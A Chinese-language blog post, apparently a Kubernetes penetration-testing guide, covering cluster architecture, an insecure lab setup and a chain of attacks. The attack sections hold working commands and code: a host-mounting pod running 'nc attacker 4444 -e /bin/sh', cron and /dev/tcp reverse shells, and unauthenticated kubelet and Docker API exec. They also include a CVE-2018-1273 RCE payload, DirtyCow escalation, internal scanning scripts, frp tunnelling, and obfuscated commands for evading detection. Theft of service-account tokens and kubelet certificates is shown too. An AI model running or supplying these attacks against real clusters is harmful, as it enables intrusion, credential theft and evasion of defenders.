能力中心
本站所有文章均为原创,如需转载请注明出处
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。有着以上优点,让kubernetes越来越流行。同时,安全问题逐渐明显起来。
常见的Kubernetes集群结构图如下,Master节点是集群的控制节点,Node节点则是集群的工作节点。
Master节点是Kubernetes集群的控制节点,每个Kubernetes集群里至少有一个Master节点,它负责整个集群的决策(如调度),发现和响应集群的事件。Master节点可以运行在集群中的任意一个节点上,但是最好将Master节点作为一个独立节点,不在该节点上创建容器,因为如果该节点出现问题导致宕机或不可用,整个集群的管理就会失效。
在Master节点上,通常会运行以下服务:
控制和管理器,运行在Master上,每个控制器都是独立的进程,但为了降低复杂性,这些控制器都被编译成单一的二进制文件,并以单独的进程运行。
Node 节点是 Kubernetes 集群的工作节点,每个集群中至少需要一台Node节点,它负责真正的运行Pod,当某个Node节点出现问题而导致宕机时,Master会自动将该节点上的Pod调度到其他节点。Node节点可以运行在物理机上,也可以运行在虚拟机中。
在Node节点上,通常会运行以下服务:
Node节点可以在集群运行期间动态增加,只要整个节点已经正确安装配置和启动了上面的进程。在默认情况下,kubelet会向Master自动注册。一旦Node被接入到集群管理中,kubelet会定时向Master节点汇报自身的情况(操作系统,Docker版本,CPU内存使用情况等),这样Master便可以在知道每个节点的详细情况的同时,还能知道该节点是否是正常运行。当Node节点心跳超时时,Master节点会自动判断该节点处于不可用状态,并会对该Node节点上的Pod进行迁移。
Pod是Kubernetes最重要也是最基本的概念,一个Pod是一组共享网络和存储(可以是一个或多个)的容器。Pod中的容器都是统一进行调度,并且运行在共享上下文中。一个Pod被定义为一个逻辑的host,它包括一个或多个相对耦合的容器。
Pod的共享上下文,实际上是一组由namespace、cgroups, 其他资源的隔离的集合,意味着Pod中的资源已经是被隔离过了的,而在Pod中的每一个独立的container又对Pod中的资源进行了二次隔离。
Kubernetes Service 定义了这样一种抽象:一个 Pod 的逻辑分组,一种可以访问它们的策略,通常称为微服务。 这一组Pod能够被Service访问到,通常是通过Label Selector实现的。
举个例子,考虑一个图片处理 backend,它运行了3个副本,这些副本是可互换的,frontend 不需要关心它们调用了哪个 backend 副本。 然而组成这一组 backend 程序的 Pod 实际上可能会发生变化,frontend 客户端不应该也没必要知道,而且也不需要跟踪这一组 backend 的状态。 Service 定义的抽象能够解耦这种关联。
对 Kubernetes 集群中的应用,Kubernetes 提供了简单的 Endpoints API,只要 Service 中的一组 Pod 发生变更,应用程序就会被更新。 对非 Kubernetes 集群中的应用,Kubernetes 提供了基于 VIP 的网桥的方式访问 Service,再由 Service 重定向到 backend Pod。
Namespace是对一组资源和对象的抽象集合,比如可以用来将系统内部的对象划分为不同的项目组或用户组。常见的pods, services, replication controllers和deployments等都是属于某一个namespace的(默认是default),而node, persistentVolumes等则不属于任何namespace。
Namespace常用来隔离不同的用户,比如Kubernetes自带的服务一般运行在kube-system namespace中。
Deployment是ReplicationController的升级版本,Deployment控制器会根据在Deployment对象中描述的期望状态对Pod进行调整。通过Deployment控制器,我们可以随时了解Pod部署的进度,因为实际上Pod的创建、调度、绑定等操作都是需要时间的。
Deployment典型应用场景:
创建pod的基本流程如下:
针对在pod内部访问 apiserver,获取集群的信息和改动,kubernetes提供了特殊的认证方式:Service Account。Service Account是面向namespace的,namespace创建的时候,kubernetes会自动在这个namespace下面创建一个默认的Service Account;并且这个Service Account只能访问该namespace的资源。Service Account 和 pod、service、deployment一样是kubernetes集群中的一种资源,用户也可以创建自己的 service account。
ServiceAccount 主要包含了三个内容:namespace、Token 和 CA。namespace 指定了 pod 所在的 namespace,CA 用于验证 apiserver 的证书,token 用作身份验证。它们都通过 mount 的方式保存在 pod 的文件系统中,其中 token 保存的路径是 /var/run/secrets/kubernetes.io/serviceaccount/token ,是 apiserver 通过私钥签发 token 的 base64 编码后的结果;CA 保存的路径是 /var/run/secrets/kubernetes.io/serviceaccount/ca.crt ,namespace 保存的路径是 /var/run/secrets/kubernetes.io/serviceaccount/namespace ,也是用 base64 编码。
如果 token 能够通过认证,那么请求的用户名将被设置为system:serviceaccount:(NAMESPACE):(SERVICEACCOUNT) ,而请求的组名有两个: system:serviceaccounts 和 system:serviceaccounts:(NAMESPACE)。
在Kubernetes中,授权有ABAC(基于属性的访问控制)、RBAC(基于角色的访问控制)、Webhook、Node、AlwaysDeny(一直拒绝)和AlwaysAllow(一直允许)这6种模式。从1.6版本起,Kubernetes 默认启用RBAC访问控制策略。从1.8开始,RBAC已作为稳定的功能。通过设置–authorization-mode=RBAC。RBAC API中,通过如下的步骤进行授权:
1)定义角色:在定义角色时会指定此角色对于资源的访问控制的规则;
2)绑定角色:将主体与角色进行绑定,对用户进行访问授权。
在RBAC API中,角色包含代表权限集合的规则。在这里,权限只有被授予,而没有被拒绝的设置。在Kubernetes中有两类角色,即普通角色和集群角色。可以通过Role定义在一个命名空间中的角色,或者可以使用ClusterRole定义集群范围的角色。一个角色只能被用来授予访问单一命令空间中的资源。
Keystone 是 openstack 提供的认证和授权组件,这个方法对于已经使用 openstack 来搭建 Iaas 平台的公司比较适用,直接使用 keystone 可以保证 Iaas 和 Caas 平台保持一致的用户体系。
需要API Server在启动时指定–experimental-keystone-url=
部署在Master上暴露Kubernetes API,是Kubernetes的控制面。Kubernetes API服务器为API对象验证和配置数据,这些对象包含Pod,Service,ReplicationController等等。API Server提供REST操作以及前端到集群的共享状态,所有其它组件可以通过这些共享状态交互。
默认情况,Kubernetes API Server提供HTTP的两个端口:
1)本地主机端口
2)Secure Port
访问Rest API,会返回可用的API列表,如下所示:
如果Kubernetes API Server配置了Dashboard,通过路径/ui即可访问
该操作界面可以创建、修改、删除容器,查看日志等。我们可以编写yaml文件,构造pod来获取命令执行。如下提供了三种部署pod的方式
输入文本创建一个pod,将节点的根目录挂载到容器的/mnt目录。获取到宿主机权限
创建pod过程中,同样可命令执行反弹shell
apiVersion: v1
kind: Pod
metadata:
name: test
spec:
containers:
- name: busybox
image: busybox:1.29.2
command: ["/bin/sh"]
args: ["-c", "nc attacker 4444 -e /bin/sh"]
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /
type: Directory
进入容器组,打开命令执行窗口
Kubernetes官方提供了一个命令行工具kubectl。使用kubectl同样可以获取容器的shell,完成命令执行。并且可进入指定的容器执行命令
如果在kubelet进程启动时加–enable-debugging-handles=true参数,那么kubernetes Proxy API还会增加以下接口:
/api/v1/proxy/nodes/{name}/run #在节点上运行某个容器
/api/v1/proxy/nodes/{name}/exec #在节点上的某个容器中运行某条命令
/api/v1/proxy/nodes/{name}/attach #在节点上attach某个容器
/api/v1/proxy/nodes/{name}/portForward #实现节点上的Pod端口转发
/api/v1/proxy/nodes/{name}/logs #列出节点的各类日志信息
/api/v1/proxy/nodes/{name}/metrics #列出和该节点相关的Metrics信息
/api/v1/proxy/nodes/{name}/runningpods #列出节点内运行中的Pod信息
/api/v1/proxy/nodes/{name}/debug/pprof #列出节点内当前web服务的状态,包括CPU和内存的使用情况
除此之外,通过访问pod,访问到某个服务接口:
/api/v1/proxy/namespaces/{namespace}/pods/{name}/{path:*}
通常etcd数据库会被安装到master节点上,rest api可获取集群内token、证书、账户密码等敏感信息,默认端口为2379。访问路径/v2/keys/?recursive=true,以JSON格式返回存储在服务器上的所有密钥。部分结果如下:
安装etcdctl,可以使用类似的方式查询API
etcdctl --endpoint=http://[etcd_server_ip]:2379 ls
若存在路径/registry/secrets/default,其中可能包含对集群提升权限的默认服务令牌。
kubernetes 是一个分布式的集群管理系统,在每个节点(node)上都要运行一个 worker 对容器进行生命周期的管理,这个 worker 程序就是 kubelet。
kubelet 的主要功能就是定时从某个地方获取节点上 pod/container 的期望状态(运行什么容器、运行的副本数量、网络或者存储如何配置等等),并调用对应的容器平台接口达到这个状态。
集群状态下,kubelet 会从 master 上读取信息,但其实 kubelet 还可以从其他地方获取节点的 pod 信息。目前 kubelet 支持三种数据源:
10250端口是kubelet API的HTTPS端口,通过路径/pods获取环境变量、运行的容器信息、命名空间等信息。如下所示:
获取到namespace、pod、container的信息后,执行如下请求。实现命令执行
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://kube-node-here:10250/exec/<namespace>/<podname>/<container-name>?command=touch&command=hello_world&input=1&output=1&tty=1"
本地搭建测试环境进行复现,从返回结果中得到websocket地址
采用wscat进行websocket连接。wscat是一个用来连接websocket的命令行工具,由nodejs开发,通过npm进行安装 npm install -g wscat
kubernetes的容器编排技术进行管理构成的docker集群,kubernetes是google开源的容器管理系统,实现基于Docker构建容器,利用kubernetes可以很方便的管理含有多台Docker主机中的容器,将多个docker主机抽象为一个资源,以集群方式管理容器。
当docker配置了Rest api,我们可以通过路径/containers/json 获取服务器主机当前运行的container列表。找到存在未授权访问的目标主机,发现已经被安装门罗币矿机。如下图所示:
通过远程访问接口,获得容器访问权限。启动容器时通过挂载根目录到容器内的目录,获取宿主机权限。输入如下指令,获取容器操作权限
docker -H tcp://xxx.xxx.xxx.xxx:2375 run -it -v /root/.ssh/:/mnt alpine /bin/sh
为实现对宿主机的控制,使用方法如下:
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/IP/PORT 0>&1\n\n" >> /mnt/root
容器和宿主机是共用内核的,所以如果宿主机的Linux内核没升级的话,利用DirtyCow(CVE-2016-5195)漏洞可获取宿主机root权限。
漏洞影响范围:2.x~4.83
利用方法:
下载提权root的exploit https://github.com/FireFart/dirtycow
使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译,生成一个dirty的可执行文件
执行./dirty 密码命令,即可进行提权。获取username和password,输入su username获取root权限
Service Account 概念的引入是基于这样的使用场景:运行在 Pod 里的进程需要调用 Kubernetes API 以及非 Kubernetes API 的其它服务(如 image repository/被 mount 到 Pod 上的 NFS volumes 中的 file 等)。
Kubernetes 默认会挂载 /run/secrets/kubernetes.io/serviceaccount/token 到各个 Pod 里,但这样会导致攻击者进入容器后读取 token 就能和 Kubernetes API 通信了。如果Kubernetes增加了RBAC授权,可能无法使用token进行通信。
系统版本:centos7x3.10.0-514.el7.x86_64
Kubernetes版本:v1.8.3
Kubernetes-node版本:v1.8.3
Docker版本:docker-ce.x86_64 0:18.03.1.ce-1.el7.centos
关闭防火墙并禁止开机自启
systemctl stop firewalld.service
systemctl disable firewalld
关闭selinux
sed -i ‘s/SELINUX=enforcing/SELINUX=disabled/g’ /etc/sysconfig/selinux
重启 reboot
安装组件:
1)下载二进制源码包
wget https://storage.googleapis.com/kubernetes-release/release/v1.8.3/kubernetes-server-linux-amd64.tar.gz
2)解压源码包
tar zxf kubernetes-server-linux-amd64.tar.gz
3)递归创建kubernetes运行文件存放目录
mkdir -p /k8s/{bin,cfg}
4)将解压目录里的文件移动到新创建的目录里
mv kubernetes/server/bin/{kube-apiserver,kube-controller-manager,kube-scheduler,kubectl} /k8s/bin/
1)安装etcd
yum -y install etcd
2)编辑etcd的配置文件
vi /etc/etcd/etcd.conf
ETCD_DATA_DIR="/var/lib/etcd/default.etcd"
ETCD_LISTEN_CLIENT_URLS="http://0.0.0.0:2379"
ETCD_NAME="default"
ETCD_ADVERTISE_CLIENT_URLS="http://0.0.0.0:2379"
3)启动etcd服务
设置etcd服务开机自启 : systemctl enable etcd
启动etcd服务 : systemctl start etcd
1)创建kube-apiserver配置文件
vi /k8s/cfg/kube-apiserver
#启用日志标准错误
KUBE_LOGTOSTDERR="--logtostderr=true"
#日志级别
KUBE_LOG_LEVEL="--v=4"
#Etcd服务地址
KUBE_ETCD_SERVERS="--etcd-servers=http://10.0.85.110:2379"
#API服务监听地址
KUBE_API_ADDRESS="--insecure-bind-address=0.0.0.0"
#API服务监听端口
KUBE_API_PORT="--insecure-port=8080"
#对集群中成员提供API服务地址
KUBE_ADVERTISE_ADDR="--advertise-address=10.0.85.110"
#允许容器请求特权模式,默认false
KUBE_ALLOW_PRIV="--allow-privileged=false"
#集群分配的IP范围
KUBE_SERVICE_ADDRESSES="--service-cluster-ip-range=10.0.0.0/16"
2)创建kube-apiserver的systemd服务启动文件
vi /lib/systemd/system/kube-apiserver.service
[Unit]
Description=Kubernetes API Server
Documentation=https://github.com/kubernetes/kubernetes
[Service]
EnvironmentFile=-/k8s/cfg/kube-apiserver
ExecStart=/k8s/bin/kube-apiserver \
${KUBE_LOGTOSTDERR} \
${KUBE_LOG_LEVEL} \
${KUBE_ETCD_SERVERS} \
${KUBE_API_ADDRESS} \
${KUBE_API_PORT} \
${KUBE_ADVERTISE_ADDR} \
${KUBE_ALLOW_PRIV} \
${KUBE_SERVICE_ADDRESSES}
Restart=on-failure
[Install]
WantedBy=multi-user.target
3)启动kube-apiserver服务
#重新加载kube-apiserver服务守护进程
systemctl daemon-reload
#设置kube-apiserver服务开机自启
systemctl enable kube-apiserver
#重启kube-apiserver服务
systemctl restart kube-apiserver
1)创建kube-scheduler配置文件
vi /k8s/cfg/kube-scheduler
#启用日志标准错误
KUBE_LOGTOSTDERR="--logtostderr=true"
#日志级别
KUBE_LOG_LEVEL="--v=4"
#k8s-master服务地址
KUBE_MASTER="--master=10.0.85.110:8080"
#指定master为控制台
KUBE_LEADER_ELECT="--leader-elect"
2)创建kube-scheduler的systemd服务启动文件
vi /lib/systemd/system/kube-scheduler.service
[Unit]
Description=Kubernetes Scheduler
Documentation=https://github.com/kubernetes/kubernetes
[Service]
EnvironmentFile=/k8s/cfg/kube-scheduler
ExecStart=/k8s/bin/kube-scheduler \
${KUBE_LOGTOSTDERR} \
${KUBE_LOG_LEVEL} \
${KUBE_MASTER} \
${KUBE_LEADER_ELECT}
Restart=on-failure
[Install]
WantedBy=multi-user.target
3)启动kube-scheduler服务
#重新加载kube-scheduler服务守护进程
systemctl daemon-reload
#设置kube-scheduler服务开机自启
systemctl enable kube-scheduler
#重新启动kube-scheduler服务
systemctl restart kube-scheduler
1)创建kube-controller-manager配置文件
vi /k8s/cfg/kube-controller-manager
#启用日志标准错误
KUBE_LOGTOSTDERR="--logtostderr=true"
#日志级别
KUBE_LOG_LEVEL="--v=4"
#k8s-master服务地址
KUBE_MASTER="--master=10.0.85.113:8080"
2)创建kube-controller-manager的systemd服务启动文件
vi /lib/systemd/system/kube-controller-manager.service
[Unit]
Description=Kubernetes Controller Manager
Documentation=https://github.com/kubernetes/kubernetes
[Service]
EnvironmentFile=/k8s/cfg/kube-controller-manager
ExecStart=/k8s/bin/kube-controller-manager \
${KUBE_LOGTOSTDERR} \
${KUBE_LOG_LEVEL} \
${KUBE_MASTER} \
${KUBE_LEADER_ELECT}
Restart=on-failure
[Install]
WantedBy=multi-user.target
3)启动kube-controller-manager服务
#重新加载kube-controller-manager服务守护进程
systemctl daemon-reload
#设置kube-controller-manager服务开机自启
systemctl enable kube-controller-manager
#重新启动kube-controller-manager服务
systemctl restart kube-controller-manager
安装组件:
1)下载二进制源码包
wget https://storage.googleapis.com/kubernetes-release/release/v1.8.3/kubernetes-node-linux-amd64.tar.gz
2)解压源码包
tar zxf kubernetes-node-linux-amd64.tar.gz
3)递归创建kubernetes运行文件存放目录
mkdir -p /k8s/{bin,cfg}
4)将解压目录里的文件移动到新创建的目录里
mv kubernetes/node/bin/{ kubectl,kubelet,kube-proxy} /k8s/bin/
5)创建连接master apiserver配置文件
vi /k8s/cfg/kubelet.kubeconfig
apiVersion: v1
kind: Config
clusters:
- cluster:
server: http://10.0.85.110:8080
name: local
contexts:
- context:
cluster: local
name: local
current-context: local
6)创建kubelet配置文件
vi /k8s/cfg/kubelet
#启用日志标准错误
KUBE_LOGTOSTDERR="--logtostderr=true"
#日志级别
KUBE_LOG_LEVEL="--v=4"
#Kubelet服务IP地址
NODE_ADDRESS="--address=10.0.85.113"
#Kubelet服务端口
NODE_PORT="--port=10250"
#自定义节点名称
NODE_HOSTNAME="--hostname-override=10.0.85.113"
#kubeconfig路径,指定连接API服务器
KUBELET_KUBECONFIG="--kubeconfig=/k8s/cfg/kubelet.kubeconfig"
#允许容器请求特权模式,默认false
KUBE_ALLOW_PRIV="--allow-privileged=false"
#DNS信息
KUBELET_DNS_IP="--cluster-dns=10.0.100.2"
KUBELET_DNS_DOMAIN="--cluster-domain=cluster.local"
#禁用使用Swap
KUBELET_SWAP="--fail-swap-on=false"
KUBELET_ARGS="--pod-infra-container-image=docker.io/kubernetes/pause"
7)创建kubelet服务的systemd启动文件
vi /lib/systemd/system/kubelet.service
[Unit]
Description=Kubernetes Kubelet
After=docker.service
Requires=docker.service
[Service]
EnvironmentFile=-/k8s/cfg/kubelet
ExecStart=/k8s/bin/kubelet \
${KUBE_LOGTOSTDERR} \
${KUBE_LOG_LEVEL} \
${NODE_ADDRESS} \
${NODE_PORT} \
${NODE_HOSTNAME} \
${KUBELET_KUBECONFIG} \
${KUBE_ALLOW_PRIV} \
${KUBELET_DNS_IP} \
${KUBELET_DNS_DOMAIN} \
${KUBELET_SWAP} \
${KUBELET_ARGS}
Restart=on-failure
KillMode=process
[Install]
WantedBy=multi-user.target
8)启动kubelet服务
#重新加载kubelet服务守护进程
systemctl daemon-reload
#设置kubelet服务开机自启
systemctl enable kubelet
#重新启动kubelet服务
systemctl restart kubelet
1)创建kube-proxy配置文件
vi /k8s/cfg/kube-proxy
#用日志标准错误
KUBE_LOGTOSTDERR="--logtostderr=true"
#志级别
KUBE_LOG_LEVEL="--v=4"
#定义节点名称
NODE_HOSTNAME="--hostname-override=10.0.85.113"
#PI服务地址
KUBE_MASTER="--master=http://10.0.85.110:8080"
2)创建kube-proxy服务的systemd服务启动文件
vi /lib/systemd/system/kube-proxy.service
[Unit]
Description=Kubernetes Proxy
After=network.target
[Service]
EnvironmentFile=/k8s/cfg/kube-proxy
ExecStart=/k8s/bin/kube-proxy \
${KUBE_LOGTOSTDERR} \
${KUBE_LOG_LEVEL} \
${NODE_HOSTNAME} \
${KUBE_MASTER}
Restart=on-failure
[Install]
WantedBy=multi-user.target
3)启动kube-proxy服务
#重新加载kube-proxy服务守护进程
systemctl daemon-reload
#设置kube-proxy服务开机自启
systemctl enable kube-proxy
#重启kube-apiserver服务
systemctl restart kube-proxy
1)安装docker-ce的yum源
下载yum源到本地
wget http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo
移动yum源到/etc/yum.repos.d/目录下
mv docker-ce.repo /etc/yum.repos.d/
2)从高到低排列显示docker版本
yum list docker-ce --showduplicates | sort -r
3)安装docker-ce .x86_64-18.03.1.ce-1.el7.centos
yum -y install docker-ce .x86_64-18.03.1.ce-1.el7.centos
4) 配置Docker配置文件,使其允许从registry中拉取镜像
vim /etc/sysconfig/docker
# /etc/sysconfig/docker
# Modify these options if you want to change the way the docker daemon runs
OPTIONS='--selinux-enabled --log-driver=journald --signature-verification=false'
if [ -z "${DOCKER_CERT_PATH}" ]; then
DOCKER_CERT_PATH=/etc/docker
fi
OPTIONS='--insecure-registry registry:5000'
5)启动docker服务
//设置docker开机自启
systemctl enable docker
//启动docker服务
systemctl start docker
//重启docker服务
systemctl restart docker
1) 安装Flannel
在master、node上均执行如下命令,进行安装
yum install flannel
2) 配置Flannel
master、node上均编辑/etc/sysconfig/flanneld,修改 FLANNEL_ETCD_ENDPOINTS
部分
vi /etc/sysconfig/flanneld
# Flanneld configuration options
# etcd url location. Point this to the server where etcd runs
FLANNEL_ETCD_ENDPOINTS="http://10.0.85.110:2379"
# etcd config key. This is the configuration key that flannel queries
# For address range assignment
FLANNEL_ETCD_PREFIX="/atomic.io/network"
# Any additional options that you want to pass
#FLANNEL_OPTIONS=""
3) 配置etcd中关于flannel的key
Flannel使用Etcd进行配置,来保证多个Flannel实例之间的配置一致性,所以需要在etcd上进行如下配置:(‘/atomic.io/network/config’这个key与上文/etc/sysconfig/flannel中的配置项FLANNEL_ETCD_PREFIX是相对应的,错误的话启动就会出错)
[root@k8s-master ~]# etcdctl mk /atomic.io/network/config '{ "Network": "10.0.0.0/16" }'
{ "Network": "10.0.0.0/16" }
1.设置k8s命令的环境变量
echo "export PATH=$PATH:/k8s/bin" >> /etc/profile
注:当前两台机器上都执行!
2.让环境变量立即生效
source /etc/profile
3.启动master
systemctl enable flanneld.service
systemctl start flanneld.service
systemctl daemon-reload
systemctl restart kube-apiserver
systemctl restart kube-scheduler
systemctl restart kube-controller-manager
3.启动node
service docker restart
systemctl enable flanneld.service
systemctl start flanneld.service
service docker restart
systemctl restart kubelet
systemctl restart kube-proxy
集群部署的过程中,经常会出现各种问题。基本排查错误的过程如下:
1)执行如下命令,查看是否有组件未启动成功。未启动成功会显示异常错误信息
systemctl status flanneld.service
systemctl status kubelet
systemctl status kube-apiserver
systemctl status kube-controller-manager
systemctl status kube-proxy
systemctl status docker
大部分情况下,报错需要重新启动。或者是由于配置文件的格式错误,具体错误在命令后加 -l
2) systemctl 无法查看到具体错误的情况下,需要查看系统日志文件进行查错
Spring Data Commons组件中存在远程代码执行漏洞(CVE-2018-1273),攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模块。此漏洞产生于Spring Data Commons组件,该组件为提供共享的基础框架,适合各个子项目使用,支持跨数据库持久化。请受此漏洞影响用户尽快升级组件。
漏洞影响:
创建deployment,编写文件 RCE-vul.yaml 如下所示:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: rce-deployment
labels:
name: rce-deployment
spec:
replicas: 1
template:
metadata:
labels:
app: vul-rce
spec:
containers:
- name: rce-container
image: knqyf263/cve-2018-1273
imagePullPolicy: Always
为了实现node节点主机访问该应用,创建service,编写 vul-sr.yaml 如下所示:
apiVersion: v1
kind: Service
metadata:
name: rce-deployment
labels:
name: rce-deployment
spec:
type: NodePort
ports:
- port: 8080
nodePort: 30001
selector:
app: vul-rce
在master主机分别执行:
kubectl create -f RCE-vul.yaml
kubectl create -f vul-sr.yaml
创建完成后,执行 kubectl get services
可以看到成功映射端口
接着回到node节点主机,关闭防火墙。仍然存在外部无法访问应用的情况,执行命令 iptables -P FORWARD ACCEPT
利用漏洞,实现反弹shell。执行如下payload:
curl -v -d 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("cp /etc/passwd /tmp")]=test' 'http://localhost:8080/users/'
反弹shell的过程中,payload存在特殊字符,无法执行。编写反弹shell的脚本,代码如下:
#!/bin/bash
bash -i >& /dev/tcp/ip/port 0>&1
下载脚本文件至目标主机,测试过程中,发现目标测试环境无法解析域名。这个问题需修改 kubelet
配置文件中 KUBELET_DNS_IP
为公网DNS 8.8.8.8
。但本次测试决定使用域名无法解析的环境。
在服务器上执行 python -m SimpleHTTPServer 10888
通过python临时开启http服务下载文件
接着执行该文件,获取shell
输入指令 env,获取到当前容器信息。只有Deployment的IP,没有node节点的信息
集群的组件中可利用的默认端口如下:
局域网地址范围分三类,以下IP段为内网IP段:
编写简单的多线程linux shell脚本对比nmap的扫描速率,代码如下:
#!/bin/bash
NETWORK=$1
for a in $(seq 1 255)
do
for b in $(seq 1 255)
do
{
ping -c 1 -w 1 $NETWORK.$a.$b &>/dev/null && result=0 || result=1
if [ "$result" == 0 ];then
echo -e "\033[32;1m$NETWORK.$a.$b is up! \033[0m"
echo "$NETWORK.$a.$b" >> AllHosts_up.txt
else
echo -e "\033[;31m$NETWORK.$a.$b is down!\033[0m"
fi
} &
done
done
对A类地址的C段进行扫描对比,结果如下:
执行脚本 time sh shell.sh 10.0 ,耗费了13min41s
使用nmap对存活主机探测,调整并行扫描组及探测报文并行度为最小,通过ICMP echo判定主机是否存活。执行命令及结果如下:
nmap 10.0.0.1/16 -sn -PE --min-hostgroup 1024 --min-parallelism 1024 -oG ip_scan.txt
对比结果,nmap可以更快的实现对存活主机的探测。
为了获取宿主机权限,攻击流程如下:
curl -O https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/nmap
下载编译好的nmap工具。– 先对A类地址进行探测,执行命令 ./nmap 10.0.0.1/16 -sn PE --min-rate 1000 -oG ip_scan.txt
– 对B类地址进行探测 ./nmap 172.0.0.0/16 172.16.0.0/12 -sn -PE --min-rate 1000 -oG ip_scan.txt
– 对输出结果中的ip进行过滤,执行命令 cat ip_scan.txt |grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)'
#!/bin/bash
for i in $(cat AllHosts_up.txt)
do
for j in 8080 10250 10255 6643 2379 30000 2375
do
curl $i:$j &>/dev/null
if [ $? -eq 0 ]; then
echo "$i 开放了 $j 端口"
echo "$i:$j" >> portScan.txt
else
echo "$i 未开放 $j 端口"
fi
done
done
简单测试结果如下:
https://dl.k8s.io/v1.9.3/kubernetes-client-linux-amd64.tar.gz
下载文件至于服务器上,使用python开放http服务提供下载。执行如下命令:
wget http://x.x.x.x/kubernetes-client-linux-amd64.tar.gz
tar -zxvf kubernetes-client-linux-amd64.tar.gz
cd kubernetes/client/bin
chmod +x ./kubectl
mv ./kubectl /usr/local/bin/kubectl
运行 kubectl version,返回版本信息,说明安装成功
apiVersion: v1
kind: Pod
metadata:
name: test
spec:
containers:
服务端开启监听,执行命令 kubectl -s http://10.0.xxx.xxx:8080/ create -f vul.yaml
。进入/mnt目录,可以看到获取了宿主机权限。但由于根目录位于/mnt下,与当前环境变量冲突,部分工具无法使用。
echo -e “* * * * * root bash -i >& /dev/tcp/ip/port 0>&1\n” >> /mnt/etc/crontab
在服务端开启端口监听,等待一段时候后获取shell,shell的主机名为宿主机
渗透过程里,根据具体环境需求,可以搭建内网穿透代理服务来进行后渗透阶段。
frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。
下载地址:
https://github.com/fatedier/frp/releases
在公网服务器上修改 frps.ini 文件,默认端口7000,可更改绑定端口。通过./frps -c ./frps.ini
启动,在公网监听7000。
在内网主机上,增加配置如下:
[common]
server_addr = 公网IP
server_port = 7000
[plugin_http_proxy]
type = tcp
remote_port = 6004
plugin = http_proxy
plugin_http_user = abcd
plugin_http_passwd = abcd
通过 ./frpc -c ./frpc.ini
启动客户端
在浏览器中,使用SwitchyOmega配置公网IP及代理端口6004,输入账号和密码。使用代理实现对内网服务器主机的访问,前提是不和客户端在同一出口IP下
由于命令特征明显,容易被具有强特征检测的设备发现。可采用通配符的方式进行绕过,在windows中的案例如下:
C:\>powershell C:\??*?\*3?\c?lc.?x? calc
C:\>powershell C:\*\*2\n??e*d.* notepad
C:\>powershell C:\*\*2\t?s*r.* taskmgr
linux 环境下命令执行,绕过方式如下:
/bin/cat /etc/passwd
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/???/?at /???/????w?
/??'?'/?at /???/????w?
通过NetCat命令执行反弹shell
nc -e /bin/bash 127.0.0.1 1337
/???/?c.??????????? -e /???/b??h 2130706433 1337
更多命令的绕过方式可参考如下文章https://medium.com/secjuice/waf-evasion-techniques-718026d693d8
在探测过程中发现未授权访问访问的Kublet API,通过 curl -s https://k8-node:10250/runningpods/
获取到pod信息。
接着根据这些信息,检查 env
并查看kublet令牌是否在环境变量中。取决于云提供商或托管服务提供商,否则我们需要从以下位置检索它们:
使用以下命令检查env:
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"
查看返回内容中的KUBLET_CERT,KUBLET_KEY和CA_CERT环境变量
在获取到认证信息后,需要在 env
中找到kubernetes API server。并非开放了10250端口的主机
KUBERNETES_PORT=tcp://x.x.x.x:443
or
KUBERNETES_MASTER_NAME: x.x.x.x:443
下载kubectl后,利用获取到的密钥和证书对kubernetes API server进行访问
kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces
如果在环境变量中并未发现认证信息,再次查看是否存在挂载目录
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
如上红色标记部分显示,可以看到serviceaccount的挂载目录,接着执行
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"
获得输入如下:
total 4
drwxrwxrwt3 root root 140 Nov 9 16:27 .
drwxr-xr-x3 root root 4.0K Nov 9 16:27 ..
lrwxrwxrwx1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crt
